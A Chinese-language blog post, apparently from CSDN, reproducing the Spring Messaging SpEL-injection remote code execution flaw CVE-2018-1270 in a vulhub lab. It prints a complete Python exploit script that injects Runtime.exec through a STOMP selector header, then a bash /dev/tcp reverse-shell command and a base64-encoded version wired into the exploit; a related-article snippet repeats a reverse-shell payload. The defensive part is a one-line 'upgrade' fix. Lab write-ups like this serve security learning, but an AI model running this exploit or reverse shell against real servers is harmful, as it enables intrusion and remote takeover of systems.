Spring-Messaging远程代码执行漏洞复现(CVE-2018-1270)

最新推荐文章于 2024-03-20 14:22:09 发布
最新推荐文章于 2024-03-20 14:22:09 发布
阅读量867 收藏 2
点赞数 1
文章标签: spring java python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59741143/article/details/126361891
版权

 第一次发博客,记录一次复现过程。

漏洞描述:

Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条SpEL表达式消息造成远程代码执行。如果使用了Spring Security项目中的权限认证,可以在一定程度上增加漏洞利用难度。

1、WebSocket协议,是HTML5提供的一种可在单个TCP连接上进行全双工通讯的协议。即允许服务端主动向客户端推送数据。

2、SockJS,一个JavaScript库,它在浏览器和Web服务器之间创建了一个低延迟、全双工、跨域通信通道。另外由于WebSocket是HTML5新增的特性,一些浏览器可能不支持,因此回退机制就很必要。SockJS就提供了该功能,即优先使用WebSocket,当浏览器不支持WebSocket时,会自动降为轮询或其他方式。

3、STOMP(Simple Text Orientated Messaging Protocol),简单面向文本的消息传递协议,可以理解为它是对WebSocket协议的封装,可以类比http与tcp的关系。

漏洞复现 :

开启环境:

访问http://192.168.75.130:8080/

先点击Connect按钮与服务端建立连接,这时selector头也发送到了服务端:

发送消息与服务端通信时,发送的Spring表达式会被解析,从而造成rce。

利用vulhub中的exploit.py:

 

#!/usr/bin/env python3

import requests

import random

import string

import time

import threading

import logging

import sys

import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):

letters = string.ascii_lowercase + string.digits

return ''.join(random.choice(letters) for c in range(length))

class SockJS(threading.Thread):

def __init__(self, url, *args, **kwargs):

super().__init__(*args, **kwargs)

self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'

self.daemon = True

self.session = requests.session()

self.session.headers = {

'Referer': url,

'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'

}

self.t = int(time.time()*1000)

def run(self):

url = f'{self.base}/htmlfile?c=_jp.vulhub'

response = self.session.get(url, stream=True)

for line in response.iter_lines():

time.sleep(0.5)

def send(self, command, headers, body=''):

data = [command.upper(), '\n']

data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))

data.append('\n\n')

data.append(body)

data.append('\x00')

data = json.dumps([''.join(data)])

response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)

if response.status_code != 204:

logging.info(f"send '{command}' data error.")

else:

logging.info(f"send '{command}' data success.")

def __del__(self):

self.session.close()

sockjs = SockJS('http://your-ip:8080/gs-guide-websocket')

sockjs.start()

time.sleep(1)

sockjs.send('connect', {

'accept-version': '1.1,1.0',

'heart-beat': '10000,10000'

})

sockjs.send('subscribe', {

'selector': "T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')",

'id': 'sub-0',

'destination': '/topic/greetings'

})

data = json.dumps({'name': 'vulhub'})

sockjs.send('send', {

'content-length': len(data),

'destination': '/app/hello'

}, data)

使用vi命令修改ip为靶机ip:

执行攻击脚本:

进入容器查看,成功创建success文件:

验证成功。

 

尝试反弹shell:

开启监听:

利用反弹shell指令:

bash -i >& /dev/tcp/your-ip/7777 0>&1

 经base64编码后为:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjEzMC83Nzc3IDA+JjE=

修改EXP:

将:

'selector': "T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')"

修改为:

'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}')"

执行EXP:

shell反弹成功:

实现远程命令执行。

漏洞修复:

升级版本。

 

qq_59741143
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2018-1270——Spring Messaging 远程命令执行漏洞
记录并分享学习安全的知识点..
01-17 754
一、漏洞概述 spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 二、漏洞页面如下: exp如下: x.x.x.x/gs-guide-websocket 我是用dnslog验证的: 用我的方法poc如..
Spring Messaging-远程命令执行漏洞CVE-2018-1270)
qq_43381463的博客
04-19 422
spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用`StandardEvaluationContext`解析,造成命令执行漏洞
[JAVA安全]Spring Messaging之CVE-2018-1270
snowlyzz的博客
02-19 866
SpEL注入漏洞
log4j2远程代码执行漏洞原理与漏洞
最新发布
人若无名,便可专心练剑
03-20 1657
在看我写的log4j2远程代码执行漏洞之前,师傅们可以看看我前面写的《JNDI注入原理及利用IDEA漏洞》这篇文章,因为log4j2远程代码执行漏洞里面有讲JNDI注入,这样可以对师傅的理解更加深刻也更加容易理解!
Spring Messaging 远程命令执行漏洞 CVE-2018-1270 漏洞
ADummy的博客
03-02 1005
Spring Messaging 远程命令执行漏洞CVE-2018-1270) by ADummy 0x00利用路线 ​ 订阅的时候插入SpEL表达式—>向此订阅发送消息—>触发命令执行 0x01漏洞介绍 ​ STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间
Spring Messaging 远程命令执行漏洞CVE-2018-1270)
黑白的博客
12-20 1199
声明 好好学习,天天向上 漏洞描述 spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS, 在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版
Spring Messaging远程命令执行漏洞CVE-2018-1270)
wutiangui的博客
09-10 429
Spring Messaging为Spring框架提供消息支持,用户使用受影响版本的Spring Framework时,允许应用程序通过Spring Messaging模块内存中STOMP代理创建WebSocket。由于selector用SpEL表达式编写,并使用StandardEvaluationContext解析(权限太大),进而导致远程执行代码攻击。访问:http://192.168.25.128:8080/gs-guide-websocket。1.准备shell命令。
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270)
mole_exp的博客
02-26 8146
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270)
vulhub-Spring Messaging 远程命令执行漏洞CVE-2018-1270)
weixin_42513429的博客
08-20 454
https://vulhub.org/#/environments/spring/CVE-2018-1270/ 根据官方的说法,应用的场景各不相同,官方的exp代码还是很容易看懂的 1、基础地址,在vulhub中为http://your-ip:8080/gs-guide-websocket 2、待执行的SpEL表达式,如T(java.lang.Runtime).getRuntime().exec('touch /tmp/success') 3、某一个订阅的地址,如vulhub中为:/topic/gree.
Spring-Messaging远程代码执行漏洞CVE-2018-1270)
m0_65150886的博客
12-27 1221
'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')
spring-messaging远程代码执行漏洞CVE-2018-1270)
锋刃科技的博客
01-07 1497
漏洞概述 Spring框架中通过spring-messaging模块来实STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条消息造成远程代码执行 影响版本 Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14 环境搭建 拉取环境 docker ...
spring-messaging-5.0.8.RELEASE-API文档-中文版.zip
06-26
赠送源代码spring-messaging-5.0.8.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-messaging-5.0.8.RELEASE.pom; 包含翻译后的API文档:spring-messaging-5.0.8.RELEASE-javadoc-API文档-中文(简体)版....
spring-messaging-4.3.12.RELEASE-API文档-中英对照版.zip
07-11
赠送源代码spring-messaging-4.3.12.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-messaging-4.3.12.RELEASE.pom; 包含翻译后的API文档:spring-messaging-4.3.12.RELEASE-javadoc-API文档-中文(简体)-...
spring-messaging-4.3.20.RELEASE-API文档-中英对照版.zip
04-07
赠送源代码spring-messaging-4.3.20.RELEASE-sources.jar 包含翻译后的API文档:spring-messaging-4.3.20.RELEASE-javadoc-API文档-中文(简体)-英语-对照版.zip 对应Maven信息:groupId:org.springframework,...
spring-messaging-4.3.20.RELEASE-API文档-中文版.zip
04-08
赠送源代码spring-messaging-4.3.20.RELEASE-sources.jar; 包含翻译后的API文档:spring-messaging-4.3.20.RELEASE-javadoc-API文档-中文(简体)版.zip 对应Maven信息:groupId:org.springframework,artifactId...
spring-messaging-4.1.3.RELEASE.jar
02-26
spring-messaging-4.1.3.RELEASE.jarspring-messaging-4.1.3.RELEASE.jarspring-messaging-4.1.3.RELEASE.jarspring-messaging-4.1.3.RELEASE.jar
vulhubspring-messaging远程代码执行漏洞CVE-2018-1270)
m0_70483044的博客
07-15 1534
spring-messaging模块为集成messaging api和消息协议提供支持。spring框架中通过spring-messaging模块实STOMP(Simple Text-Orientated Messaging Protocal)-面向消息的简单文本协议.STOMP是一种封装WebSocket连接并发一条消息造成远程代码执行。STOMP为浏览器和服务器之间的通信增加适当的消息语义。创建好环境我们看一下页面为啥有了http协议还需要webscket协议咧...
记一次曲折的CVE-2018-1270分析
蚁景网安学院
04-02 2639
前两天接到朋友对某个授权目标的漏扫结果,也算是初次接触到这个漏洞,就想着顺手分析一下一下,因为分析这个漏洞的文章也比较少,所以刚开始比较迷,进度也比较慢。
org.springframework:spring-messaging:5.3.18 依赖
05-20
这是 Spring Framework 5.3.18 中的一个 Maven 依赖项,它提供了对 Spring Messaging 模块的支持。Spring Messaging 提供了基于消息的应用程序的支持,包括支持 STOMP(简单文本定向消息协议)和 WebSocket。它还提供了对 AMQP(高级消息队列协议)和 JMS(Java消息服务)的支持。 通过这个依赖,你可以在你的应用程序中使用 Spring Messaging 模块提供的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值